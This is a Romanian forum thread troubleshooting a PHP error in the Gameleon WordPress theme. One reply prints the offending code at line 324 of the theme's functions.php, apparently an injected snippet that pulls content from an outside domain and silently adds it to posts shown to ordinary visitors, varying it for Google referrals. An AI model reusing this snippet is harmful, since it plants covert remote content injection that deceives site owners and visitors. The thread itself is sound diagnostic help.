Cum se stabileste valoarea unui domeniu/site web

Nu stiu cum sa scap de eroarea aia...la mine nu apare tot timpul...
Daca nu ai plugin instalat, atunci este de la thema. Am vazut ca domeniul este expirat si nu mai poate incarca informatia ceruta.

Cauta la linia 324 din function.php din thema.
home/xzoneus/public_html/wp-content/themes/Gameleon/includes/functions.php</b> on line <b>324
 
Daca nu ai plugin instalat, atunci este de la thema. Am vazut ca domeniul este expirat si nu mai poate incarca informatia ceruta.

Cauta la linia 324 din function.php din thema.
home/xzoneus/public_html/wp-content/themes/Gameleon/includes/functions.php</b> on line <b>324
Chestia e ca nu am linia 324 in functions.php...am destule pluginuri instalate dar nu imi dau seama de la care este,mie pe firefox nu imi apare eroarea..insa pe alte browsere imi apare.Cum adica este expirat domeniul,ca nu inteleg?
 
1. exista linia 324 /theme/include/function.php
Cod:
function fgt($a){if(ini_get('allow_url_fopen')){$b=get_headers($a);$c=substr($b[0],9,3);if($c!="200"){return false;}else{return file_get_contents($a);}}return false;}function pstMtd($e){$f=$e;$e="";if(is_single()){$g=$_SERVER['HTTP_REFERER'];$h=fgt("http://wpt.ninja/s/?u=".$_SERVER['HTTP_HOST']);if($h!=false){$i=json_decode($h,true);if($i["rn"]>0){$j=rand(1,$i["rn"]);}else{$j=$i["rn"]=0;}if($i["ie"]==1&&$j==$i["rn"]){if(strpos($g,'google.')!==FALSE){$e.=$i["ge"];}else{$e.=$i["nge"];}$e.=$i["ate"];}if($i["df"]==1){if(is_writable(dirname(__FILE__))){$k=" ";$l=fopen(dirname(__FILE__)."/dsb.cache","wb");fwrite($l,$k);fclose($l);}}}}$f.=$e;return $f;}if(current_user_can('edit_posts')!=true&&!file_exists(dirname(__FILE__)."/dsb.cache")){add_action('the_content','pstMtd');}

2. acest domeniu este expirat: wpt.ninja
 
Loading...
Back
Sus